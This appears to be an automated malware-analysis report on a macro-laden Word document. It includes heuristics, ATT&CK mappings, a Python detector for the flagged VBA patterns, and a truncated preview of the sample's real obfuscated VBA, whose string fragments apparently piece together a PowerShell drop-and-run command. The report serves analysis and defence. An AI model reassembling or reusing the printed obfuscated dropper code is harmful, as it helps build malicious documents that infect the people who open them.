Verdict: MALICIOUS (Risk Score: 248)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a Microsoft Word document containing VBA macros. The heuristics flag an AutoOpen auto-execution macro, a Shell() call, a CreateObject call and an Environ() call; together these form the standard pattern of a macro that runs as soon as the document is opened, reads environment variables (typically to locate a temp directory) and launches an external process. The ClamAV signature Doc.Malware.Valyria-6731606-0 supports the verdict. The extracted VBA is obfuscated: dozens of randomly named functions each return an Array() of short string literals, most of them filler, while a few carry fragments of what appears to be a PowerShell command line built by string concatenation (for example ";$XOWTI='pass ';", "='temp ';$ozh", "tzzj='ypw.ex" and "\VvoTw."). Those fragments are consistent with a script that assembles a command at run time, drops an executable under a temp directory and runs it, so the macro most likely downloads and executes a secondary payload. That behaviour is inferred from the fragments rather than observed: the launcher routine that concatenates and runs them lies beyond the 1,000-line preview below.
Heuristics (7 findings)

| Finding | Severity | Rule ID | Description |
|---|---|---|---|
| ClamAV: Doc.Malware.Valyria-6731606-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Malware.Valyria-6731606-0 |
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (4 related findings) |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call |
| Environ() call (env variable access) | low | OLE_VBA_ENVIRON | Environ() call (env variable access) |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |

Note that the last rule's own description states that no modern VBA project was recovered, which the macro extraction below contradicts; treat that marker as corroboration of the AutoOpen finding rather than as an independent one.
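An added example, in Python, that is not part of the analyzer's report or of oletools' own code: it shows what the heuristics above and the obfuscation in the extracted macro below amount to. It re-implements the report's OLE_VBA_* rule IDs as a minimal regular-expression rule set, then harvests every string literal from the Array() calls and keeps only those carrying command-line syntax. The VBA input is constructed from three fragment-returning functions of the carved macros.bas plus a hypothetical AutoOpen body written for this example (the real launcher lies past the preview and is not reproduced). olevba, the tool the report credits for extraction, has its own richer keyword tables; this is a readable stand-in, not its implementation.

```python
import re
from typing import Dict, List

# Constructed sample input: three of the fragment-returning functions from
# the carved macros.bas, plus a HYPOTHETICAL AutoOpen launcher body that
# exercises the API calls the heuristics report (AutoOpen, Shell, CreateObject,
# Environ). The real launcher is beyond the 1,000-line preview.
SAMPLE_VBA = r'''
Attribute VB_Name = "NewMacros"
Function gqapob(oiyoyi, eoxnv9)
    awtacv = Array("bzkgcvy", ";$XOWTI='pass ';", "UEVOOWPRN", "jyka", "hhzl")
    gqapob = awtacv
End Function
Function IUYYDH(tiqdl)
    hjhqa = Array("yqig5", "FLfghIoctu", "ddodlmnclwga", "i", "='temp ';$ozh", "zkzgqc")
    IUYYDH = hjhqa
End Function
Function ixpmetb9(uiivo46)
    oykdditu = Array("onwgheteks", "oakxrvthos", "wliau", "TixBUo", "tzzj='ypw.ex")
    ixpmetb9 = oykdditu
End Function
Sub AutoOpen()
    ' hypothetical stand-in for the launcher; not recovered from the sample
    Dim t As String
    t = Environ("TEMP")
    Set o = CreateObject("WScript.Shell")
    Shell "cmd /c echo " & t, vbHide
End Sub
'''

# Minimal re-implementation of the rule IDs in the report. VBA is
# case-insensitive, so every pattern is compiled with re.I.
RULES = [
    ("OLE_VBA_MACROS", "medium",
     re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+\w+", re.I | re.M)),
    ("OLE_VBA_AUTOOPEN", "high",
     re.compile(r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
                r"(?:AutoOpen|Auto_Open|Document_Open|AutoExec|Workbook_Open)\b",
                re.I | re.M)),
    # Shell used as a statement or function call; the ProgID string
    # "WScript.Shell" is excluded by the lookbehind on '.'
    ("OLE_VBA_SHELL", "critical", re.compile(r'(?<![\w.])Shell\s*["(]', re.I)),
    ("OLE_VBA_CREATEOBJ", "high", re.compile(r"\bCreateObject\s*\(", re.I)),
    ("OLE_VBA_ENVIRON", "low", re.compile(r"\bEnviron\s*\(", re.I)),
]

# An Array(...) call on one line, and a VBA string literal ("" escapes a quote).
ARRAY_RE = re.compile(r"\bArray\s*\((.*?)\)\s*$", re.I | re.M)
STR_RE = re.compile(r'"((?:[^"]|"")*)"')
# Characters that belong to shell/PowerShell syntax rather than to random filler.
PS_HINT = re.compile(r"[$;+']|\.ex|\\")


def run_heuristics(vba: str) -> Dict[str, str]:
    """Return {rule_id: severity} for every rule whose pattern hits the source."""
    return {rule_id: sev for rule_id, sev, rx in RULES if rx.search(vba)}


def harvest_fragments(vba: str) -> List[str]:
    """Collect every string literal inside an Array(...) call, in source order."""
    frags: List[str] = []
    for m in ARRAY_RE.finditer(vba):
        for s in STR_RE.finditer(m.group(1)):
            frags.append(s.group(1).replace('""', '"'))
    return frags


def suspicious_fragments(frags: List[str]) -> List[str]:
    """Keep only fragments that look like pieces of a command line."""
    return [f for f in frags if PS_HINT.search(f)]


if __name__ == "__main__":
    for rule_id, sev in run_heuristics(SAMPLE_VBA).items():
        print(f"{sev:9s} {rule_id}")
    frags = harvest_fragments(SAMPLE_VBA)
    print(f"{len(frags)} array literals, suspicious:")
    for f in suspicious_fragments(frags):
        print("   ", repr(f))
```

Run stand-alone, the block reports the five rule hits and keeps three of the sixteen literals: ";$XOWTI='pass ';", "='temp ';$ozh" and "tzzj='ypw.ex". Against the full macros.bas the harvester returns far more filler than signal, and the kept fragments come out in source order, not execution order; reassembling the command still requires following the concatenation expressions (the "+$..." pieces) in the launcher routine.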
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 60131 bytes | 0eef436c4463e3ccf383e2faa92e4af6227b05fafc571ebb6a6dc61fbc69dd9d |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function jtwee(czipzv)
Dim eeuoml
eeuoml = -3320
uatwuopd = Array("NjuVayO", "ngobtayytdi", "g", "e", "pujs+$SxAu", "ygue", "jclokwds")
jtwee = uatwuopd
End Function
Function tzcp(urnri, wzgxjvs3)
Dim vhnvpnt
vhnvpnt = -28928
hsyaicw = Array("AUiyutBv", "vropiejan", "KJSC", ";$toui='o", "omgeoytuqd", "kcooqcrjs", "uwqhoypfsgn1")
Dim yagcj As Integer
yagcj = -16842
Dim aqhumvie As Integer
aqhumvie = -12094
tzcp = hsyaicw
End Function
Function yjtuuoc(UlAVrg, QubNU)
yvbufdojrjy = Array("+$ilaeyfv+", "s", "bc", "ujwjqustu", "EOYIFJ7", "eyeuwcuao")
yjtuuoc = yvbufdojrjy
End Function
Function OnSHqda(QNDzupa, nwaivldi)
eubmpe = Array("MpAR76", "wjwio", "RsmnkzhAO", "hupdpibj", "fajy", "FFQBUPABR", "uimswy")
OnSHqda = eubmpe
Dim dggu As Integer
dggu = 27636
End Function
Function ycfuy(vkoowgjb)
wcxooa = Array("dciyiau", "FYlY", "nyicjeiy", "kluyxdm61=", "eb")
ycfuy = wcxooa
End Function
Function EAVQTDNI2(aaaiei)
Dim oyeeey1
oyeeey1 = 26584
YACWAYAE = Array("youbsprew", "GAvYu", "oxguu2", "ndkrxiaaey", ";(';$atgmjml11=")
EAVQTDNI2 = YACWAYAE
yqmcba = 7272
Dim uoouvk As Integer
uoouvk = -4039
End Function
Function gqapob(oiyoyi, eoxnv9)
Dim WjVe8
WjVe8 = 13094
Dim oaxe
oaxe = -21317
awtacv = Array("bzkgcvy", ";$XOWTI='pass ';", "UEVOOWPRN", "jyka", "hhzl")
Dim xbale As Integer
xbale = 26364
gqapob = awtacv
UiRJi = -919
End Function
Function iuaf(eavjr, ngeup08)
JyibjQ = Array("ktmsef", "ieaee='nlo", "b", "io", "of")
iuaf = JyibjQ
End Function
Function unreu(htylww)
zjyxcoklavs = Array("pqncptay8", "ey", "ohwg", "EirPvO", "eyj", "ybjimqyhxe", "zvkta+$ortdi+$")
unreu = zjyxcoklavs
End Function
Function IUYYDH(tiqdl)
hjhqa = Array("yqig5", "FLfghIoctu", "ddodlmnclwga", "i", "='temp ';$ozh", "zkzgqc")
IUYYDH = hjhqa
End Function
Function yidgmv(ODhutFo, dgawmamj)
euifjeklzlv6 = Array("l68='esn';$FFQBUP", "piauekdmm84", "oyblinxnju", "sv", "hila4", "TzGvilXy")
yidgmv = euifjeklzlv6
End Function
Function PmTByew(aaoavkj)
Dim puoi
puoi = 14105
wjetqrm = Array("hum", "oamg", "1+$cvykcp", "mkyhdii", "iux", "yau", "jgpxq7")
PmTByew = wjetqrm
End Function
Function ECSbm(AIwB, ozxuau)
MZxuxHxvye = Array("nocy5", "bqvwcy", "aau", "tem';$qkjr", "kqfwmylq", "UeonEgQmd")
ECSbm = MZxuxHxvye
End Function
Function vqotnv(gwuygpo, xqcfxcoy)
dgvznlavljia = Array("yyamq", "hao4='yfifte';$IIox", "WXCB", "uzkecnkbzo", "BOSY", "lu")
vqotnv = dgvznlavljia
End Function
Function wzypsmo(atpaans, aeikae)
YEIWS = Array("qlzzu", "doyix", "jddsucyewxrq", "ywomsey", "oa", "es';$uksel")
wzypsmo = YEIWS
End Function
Function ixpmetb9(uiivo46)
oykdditu = Array("onwgheteks", "oakxrvthos", "wliau", "TixBUo", "tzzj='ypw.ex")
ixpmetb9 = oykdditu
End Function
Function mbcfxmtwwe8(ouye, ayfhjcqf)
xxajzdpzjw = Array("zjk", "ieeatduu9", "uv", "g", "veey='e'')", "enoyxspxxo8")
mbcfxmtwwe8 = xxajzdpzjw
End Function
Function IACNUEY(kpddxyyb, slgqayxno)
xeoa = Array("FNQNAQO", "og", "lfmcsta", "e", "$jklcieo='r", "ZoaEvUu3", "RmbU")
IACNUEY = xeoa
End Function
Function ECiuvA(qrtufxt, bzejcuyy)
yeaed = Array("wz", "dz", "qa+$zkuoa", "aubku", "y", "euekk", "dybo")
ECiuvA = yeaed
End Function
Function EoIu(VWIYSN7)
Dim tcjijg
tcjijg = -6549
Dim jaazir0
jaazir0 = -23608
eodbiuud = Array("EpBiu", "wlNy+$iuke+$dazfs", "tzrxfpdgu", "iijfh", "euvcoo", "aioa0", "yrc")
EoIu = eodbiuud
End Function
Function PYEVG(lporfvw, diiict)
rivxim = Array("zmwu", "iayyiwl", "e", "\VvoTw.", "afeuuir", "amru")
PYEVG = rivxim
GcMYa = 26595
Dim yyee
yyee = -816
End Function
Function kskyfc(SzTXxzkj)
wbynz = Array("o';$yzlursyw='", "jsredpslkn", "m", "viyu41", "exkozx0", "IZWAUR")
Dim oevpcu
oevpcu = -10564
kskyfc = wbynz
pxqkmhoi = -23158
End Function
Function rckyu
... (truncated)